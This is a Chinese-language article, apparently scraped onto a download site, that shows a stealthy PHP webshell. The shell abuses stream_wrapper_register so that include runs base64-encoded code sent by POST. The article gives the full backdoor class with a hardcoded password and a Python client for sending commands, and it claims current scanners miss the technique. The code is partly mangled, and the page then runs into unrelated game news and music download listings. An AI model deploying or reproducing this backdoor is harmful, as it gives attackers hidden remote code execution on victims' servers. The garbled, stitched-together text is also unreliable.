0×00 前言
在Web安全领域WebShell的构造与查杀是永不停息的话题,这几天发现了一种新型方式生成WebShell,隐蔽度高,目前安全查杀软件没法检测到相关的后门漏洞,不同于 eval 或则 asset 等方式运行后门,对于这两个函数禁用的情况下一样适用,目前除了禁用相关函数还暂时没有相关方式来避免漏洞。
0×01 后门原理
在PHP开发中,我们使用最为频繁的指令大概就是 include 指令, include 指令中一些比较普通的文件包含漏洞我们就忽略了,先来看看一串代码:
include 'http://www.test.com/code.php'
我们通过这一串代码可以很容易的引用外部的PHP程序,但是前提是配置文件允许该行为被执行,先看看我的配置项
;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;; ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ; http://php.net/allow-url-fopen allow_url_fopen =Off ; Whether to allow include/require to open URLs (like http:// or ftp://) as files. ; http://php.net/allow-url-include allow_url_include = Off
从配置文件可以看到,allow_url_include 被我关闭了,也就是包含远程代码是不可能执行的,但是我们这里利用了一个东西。http:// 流,我们知道,在PHP中很多东西都是可以通过流包装器来使用的,比如常见的 php:// 流,我们可以通过 php://input 来获取输入流来读取请求体的内容,那么根据这个思路,我们能不能通过流包装器来实现代码执行?答案是可行的 通过PHP函数 stream_wrapper_register 注册包装器,检测特定的URL包装功能,监控 include 流,在 include 流中动态生成PHP代码,我将通过如下代码执行一个 hello world 程序来证明这个过程
include 'hello://dxkite';
Hello Stream Wrapper 的实现
code = "position = 0; return true; } public function stream_read($count) { $ret = substr($this->code, $this->position, $count); $this->position += strlen($ret); return $ret; } public function stream_tell() { return $this->position; } public function stream_eof() { return $this->position >= strlen($this->code); } public function stream_seek($offset, $whence) { switch ($whence) { case SEEK_SET: if ($offset < strlen($this->code) && $offset >= 0) { $this->position = $offset; return true; } else { return false; } break; case SEEK_CUR: if ($offset >= 0) { $this->position += $offset; return true; } else { return false; } break; case SEEK_END: if (strlen($this->code) + $offset >= 0) { $this->position = strlen($this->code) + $offset; return true; } else { return false; } break; default: return false; } } public function stream_stat() { return stat(FILE); } } stream_wrapper_register('hello', HelloStream::class); include 'hello://dxkite';
通过如上的代码,经过执行后,可以输出一个 hello worldHelloWorld
0×02 后门示例
通过上述程序,我们实现了通过 include 指令直接执行 php ,并插入我们想要的效果,我们现在根据这个原理写一个Shell:
后门程序
@link //dxkite.cn */ class ShellStream { protected $position; protected $code; public function stream_open($path, $mode, $options, &$opened_path) { $url = parse_url($path); $name = $url["host"]; $this->code = base64_decode($name); $this->position = 0; return true; } public function stream_read($count) { $ret = substr($this->code, $this->position, $count); $this->position += strlen($ret); return $ret; } public function stream_tell() { return $this->position; } public function stream_eof() { return $this->position >= strlen($this->code); } public function stream_seek($offset, $whence) { switch ($whence) { case SEEK_SET: if ($offset < strlen($this->code) && $offset >= 0) { $this->position = $offset; return true; } else { return false; } break; case SEEK_CUR: if ($offset >= 0) { $this->position += $offset; return true; } else { return false; } break; case SEEK_END: if (strlen($this->code) + $offset >= 0) { $this->position = strlen($this->code) + $offset; return true; } else { return false; } break; default: return false; } } // include public function stream_stat() { return stat(FILE); } // file exists public function url_stat(string $path,int $stat) { return stat(FILE); } public static function shell(){ stream_wrapper_register('shell', ShellStream::class); if (isset($_POST['password']) && $_POST['code']) { if ($_POST['password']=='dxkite') { $code = $_POST['code']; include 'shell://'.$code; } else { include 'shell://PD9waHAgZWNobyAiaGVsbG8gaGFjayI7'; } } } }
ShellStream::shell();
上述我实现了一个使用 $_POST 作为输入,接收密码和php代码的base64并执行代码的后门利用程序
import requests import base64 import sys def send_raw(url,password,cmd): res=requests.post(url,{ 'password':password, 'code': base64.b64encode(cmd.encode('utf-8')) }) return res.text def send_php_shell(url,password,cmd): return send_raw(url,password,'') if cmd == 'exit': break elif cmd.startswith('run'): cmd,path = cmd.split(' ',1) code = '' with open(path) as f: for line in f: code = code + line + "\r\n" response = send_raw(url,password,code); print(response) else: response = send_php_shell(url,password,cmd); print(response)
我们把我们的 shell.php 部署到服务器上,执行测试 shell.py :
php-shell.png
其中,test.php 的内容为:
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
《魔兽世界》大逃杀!60人新游玩模式《强袭风暴》3月21日上线
暴雪近日发布了《魔兽世界》10.2.6 更新内容,新游玩模式《强袭风暴》即将于3月21 日在亚服上线,届时玩家将前往阿拉希高地展开一场 60 人大逃杀对战。
艾泽拉斯的冒险者已经征服了艾泽拉斯的大地及遥远的彼岸。他们在对抗世界上最致命的敌人时展现出过人的手腕,并且成功阻止终结宇宙等级的威胁。当他们在为即将于《魔兽世界》资料片《地心之战》中来袭的萨拉塔斯势力做战斗准备时,他们还需要在熟悉的阿拉希高地面对一个全新的敌人──那就是彼此。在《巨龙崛起》10.2.6 更新的《强袭风暴》中,玩家将会进入一个全新的海盗主题大逃杀式限时活动,其中包含极高的风险和史诗级的奖励。
《强袭风暴》不是普通的战场,作为一个独立于主游戏之外的活动,玩家可以用大逃杀的风格来体验《魔兽世界》,不分职业、不分装备(除了你在赛局中捡到的),光是技巧和战略的强弱之分就能决定出谁才是能坚持到最后的赢家。本次活动将会开放单人和双人模式,玩家在加入海盗主题的预赛大厅区域前,可以从强袭风暴角色画面新增好友。游玩游戏将可以累计名望轨迹,《巨龙崛起》和《魔兽世界:巫妖王之怒 经典版》的玩家都可以获得奖励。
更新日志
- 【雨果唱片】中国管弦乐《鹿回头》WAV
- APM亚流新世代《一起冒险》[FLAC/分轨][106.77MB]
- 崔健《飞狗》律冻文化[WAV+CUE][1.1G]
- 罗志祥《舞状元 (Explicit)》[320K/MP3][66.77MB]
- 尤雅.1997-幽雅精粹2CD【南方】【WAV+CUE】
- 张惠妹.2007-STAR(引进版)【EMI百代】【WAV+CUE】
- 群星.2008-LOVE情歌集VOL.8【正东】【WAV+CUE】
- 罗志祥《舞状元 (Explicit)》[FLAC/分轨][360.76MB]
- Tank《我不伟大,至少我能改变我。》[320K/MP3][160.41MB]
- Tank《我不伟大,至少我能改变我。》[FLAC/分轨][236.89MB]
- CD圣经推荐-夏韶声《谙2》SACD-ISO
- 钟镇涛-《百分百钟镇涛》首批限量版SACD-ISO
- 群星《继续微笑致敬许冠杰》[低速原抓WAV+CUE]
- 潘秀琼.2003-国语难忘金曲珍藏集【皇星全音】【WAV+CUE】
- 林东松.1997-2039玫瑰事件【宝丽金】【WAV+CUE】